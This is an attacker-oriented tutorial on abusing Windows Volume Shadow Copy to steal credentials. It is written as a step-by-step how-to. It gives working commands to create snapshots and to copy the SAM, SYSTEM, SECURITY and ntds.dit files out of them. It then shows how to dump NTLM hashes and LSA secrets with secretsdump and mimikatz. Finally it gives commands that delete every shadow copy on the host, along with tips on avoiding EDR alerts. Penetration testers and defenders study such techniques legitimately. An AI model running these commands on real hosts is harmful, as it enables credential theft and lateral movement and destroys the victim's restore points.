
💥 Shadow Copy


🧠 What’s the Deal?

Shadow copies let an attacker read files that are locked on the live system.

Volume Shadow Copy Service (VSS) is a Windows feature that creates point-in-time snapshots of a whole volume, either on demand (backup software, vssadmin, WMI) or on a schedule (System Restore points). Because the snapshot is an image of the volume, it also contains files that are locked or in use on the live system, such as the SAM, SYSTEM, and SECURITY registry hives (and NTDS.dit on a domain controller).

An attacker with administrator rights can abuse this to copy those hives out of a snapshot and extract NTLM password hashes, LSA and DPAPI secrets, and sometimes files that were deleted after the snapshot was taken.


🎯 What’s the Big Win?

What’s the attacker trying to pull off here?

  • Gain unauthorized access to accounts whose hashes live in the SAM or NTDS.dit
  • Extract sensitive data (NTLM hashes, LSA secrets, cached domain credentials, DPAPI keys)
  • Escalate privileges (local admin on a domain controller becomes every domain credential)
  • Lateral movement across the network (pass-the-hash with the dumped hashes)

🧰 Gear Up (Prereqs)

Don’t go in empty-handed. What do you need beforehand?

  • A shell on the target Windows host (RDP, WinRM, PsExec, a beacon, etc.)
  • Local administrator rights on that host; creating, listing and deleting shadow copies all require elevation
  • Knowing the host’s role: NTDS.dit only exists on a domain controller, and vssadmin can only create snapshots on Windows Server editions
  • Tools: vssadmin and wmic (built in), vshadow.exe (Windows SDK, must be dropped on the host), impacket-secretsdump or mimikatz to parse the copied hives

🚀 Launch Sequence (How-To)

Below are the steps to perform a shadow copy attack.

Check if shadow copies exist

Commands to list existing shadow copies. vssadmin and wmic are command-line tools, not PowerShell cmdlets; run them from an elevated command prompt or an elevated PowerShell session. wmic is deprecated and is not installed by default on recent Windows 11 builds, so do not rely on it.

vssadmin list shadows
wmic shadowcopy list brief

The output lists each snapshot’s ID, creation time and its device path (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN). If a usable snapshot already exists you can read from it directly and skip the next step, which also avoids creating an event of your own.

Create a new Shadow Copy

An attacker with local administrator rights can create a new shadow copy. Note that vssadmin create shadow is only available on Windows Server; on client editions (Windows 10/11) vssadmin can only list, resize and delete, so there you need WMI (wmic or PowerShell) or vshadow.exe instead. Run the following from an elevated command prompt or PowerShell:

vssadmin create shadow /for=C:

# Output (abbreviated)
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

The trailing number increments with every snapshot on the machine, so use whatever value the command actually returns in the next step.

OR use the vshadow.exe utility (ships with the Windows SDK, not present on a default install, so it has to be dropped on the host):

vshadow.exe -nw -p C:
  • -nw → no writers (faster; skips VSS writers, which is fine because we only need a readable copy of the hives)
  • -p → persistent shadow copy (survives after vshadow.exe exits; without it the snapshot is deleted when the tool returns)

Dump Sensitive Files

These files are locked on the live volume (the kernel and LSASS hold them open), but the copies inside the snapshot are readable. Copy them out from an elevated command prompt, replacing HarddiskVolumeShadowCopy1 with the device path returned in the previous step. The last line only applies to a domain controller.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit.bak

Move the copied files to your analysis machine and parse them offline with secretsdump from Impacket. LOCAL tells it to read local files instead of connecting to a host; SYSTEM is required in both cases because it holds the boot key that encrypts the other hives. The SECURITY hive yields LSA secrets and cached domain logons; NTDS.dit yields every domain account’s hashes.

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
impacket-secretsdump -ntds ntds.dit.bak -system SYSTEM LOCAL

OR, with mimikatz:

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM

Delete Shadow Copies

After the dump you may want to remove the snapshot you created. Be careful: mass deletion of shadow copies is one of the most widely alerted command lines in EDR and SIEM rule sets, because ransomware does exactly this before encrypting, and it also destroys the host’s restore points. It is usually noisier than the dump itself. If you clean up, delete only the snapshot you created (both vssadmin and vshadow accept a specific shadow copy ID instead of deleting everything), and remember that the VSS provider still logs the deletion.

vssadmin delete shadows /all /quiet

OR

vshadow.exe -da

Both of the above delete every shadow copy on the host, not just yours.